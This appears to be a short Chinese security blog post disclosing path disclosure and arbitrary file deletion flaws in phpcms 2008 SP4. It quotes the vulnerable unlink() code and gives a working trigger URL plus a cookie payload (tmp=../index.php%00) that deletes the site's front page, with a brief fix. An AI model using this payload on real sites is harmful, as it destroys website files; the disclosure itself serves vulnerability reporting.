\xeb\xfe's Blog.

phpcms 2008 sp4 爆路径及任意文件删除漏洞

2017/12/08

简要描述

某页面下,未作容错处理导致爆路径,同时过滤不严导致恶意攻击者可以删除网站任意文件

任意文件删除漏洞详细说明

在corpandresize/config.inc.php中定义:

1
2
$tmp = $_COOKIE['tmp'];
define("TMP_PATH", $tmp);

在corpandresize/process.php中用到TMP_PATH,满足前面的一系列条件后(这个很好满足,都是用户可控的):

1
@unlink(TMP_PATH.'/'.$thumbfile);

没有检查$_COOKIE[‘tmp’]就直接放入unlink()了,只要修改cookie的tmp值就可以删除网站的任意文件。

爆路径漏洞详细说明

注册用户登录后访问

1
http://localhost/phpcms/corpandresize/process.php?pic=../images/logo.gif

此时爆出绝对路径(当收集信息,没什么好利用的)
在cookie中添加一句(或修改原有值)tmp=../index.php%00即可删除首页文件

修复方案:

对页面作容错处理,对cookie的tmp值进行过滤

原文链接:phpcms 2008 sp4 爆路径及任意文件删除漏洞

CATALOG
  1. 1. 简要描述
  2. 2. 任意文件删除漏洞详细说明
  3. 3. 爆路径漏洞详细说明
  4. 4. 修复方案: